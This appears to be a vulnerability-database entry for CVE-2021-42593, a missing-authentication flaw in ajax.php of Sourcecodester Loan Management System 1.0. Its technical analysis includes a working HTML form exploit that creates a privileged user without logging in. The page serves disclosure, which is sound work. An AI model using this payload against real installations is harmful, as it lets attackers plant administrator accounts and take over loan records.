Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2021-42593

Last updated October 18, 2021
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Add Assessment

2
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

An Incorrect Access Control vulnerability exists in Sourcecodester Loan
Management System 1.0. The ajax.php endpoint.

  • if we take a look at the source code of the ajax.php file which is responsable for actions ( add, delete , modify users & more ).
  • we can see that there is no code to check for a session or the authentication of the user.

The attacker can send a POST requests to add users without any permissions or requirements. Also, without authentication just but send the following request or using the following HTML code:

 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="http://target.com/ajax.php?action=save_user" method="POST">
       <input type="hidden" name="id" value="" />
       <input type="hidden" name="name" value="CVE" />
       <input type="hidden" name="username" value="cve" />
       <input type="hidden" name="password" value="cve@password" />
       <input type="hidden" name="type" value="1" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>

General Information

Additional Info

Technical Analysis